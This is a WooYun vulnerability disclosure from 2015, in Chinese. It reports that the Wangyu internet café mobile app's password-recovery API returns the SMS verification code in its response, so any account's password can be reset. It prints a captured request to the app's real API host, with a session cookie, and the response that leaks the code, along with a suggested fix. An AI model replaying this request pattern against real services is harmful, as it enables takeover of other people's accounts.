当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0106351

漏洞标题:网鱼网咖手机应用密码找回功能存在任意账户密码重置漏洞

相关厂商:上海网鱼网咖公司

漏洞作者: xsser_w

提交时间:2015-04-20 17:12

修复时间:2015-06-04 17:14

公开时间:2015-06-04 17:14

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-20: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-06-04: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

补充下:
问题存在于密码找回功能中,验证码写在了返回包里,所以可以重置任意账户的

POST /api/index HTTP/1.1
Host: yppapi.wanyoo.com
Proxy-Connection: close
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 279
Connection: close
Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22f10d8f4538db2ab59ed4ffa1bc8f9a3a%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22183.129.152.142%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A55%3A%22%E9%B1%BC%E6%B3%A1%E6%B3%A1+2.1+rv%3A2.1.3+%28iPhone%3B+iPhone+OS+6.1.2%3B+en_US%29%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1428372131%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7De8c2af02f83a6b622bd193830dd06b45
User-Agent: 鱼泡泡 2.1 rv:2.1.3 (iPhone; iPhone OS 6.1.2; en_US)
screen=640%2A960&device_model=iphone&signature=1acc1833fd225f81d57f90e67195172baa94c131&sys_version=7.1.2&request=xxxx&method=SendVericode&soft_version=1.0&platform=ios&timespan=1428374163689


上面是请求包
我们主要看返回包

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 07 Apr 2015 02:36:52 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.28
Content-Length: 113
{"code":"8000","result":{"vericode":"6164","send_channel":"106550251961906666","match_str":"\u9c7c\u6ce1\u6ce1"}}


holy shit!! vericode 写在返回包!!!
天~

漏洞证明:

RT

修复方案:

修改Model中对用操作 去除不必要的json返回

版权声明:转载请注明来源 xsser_w@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝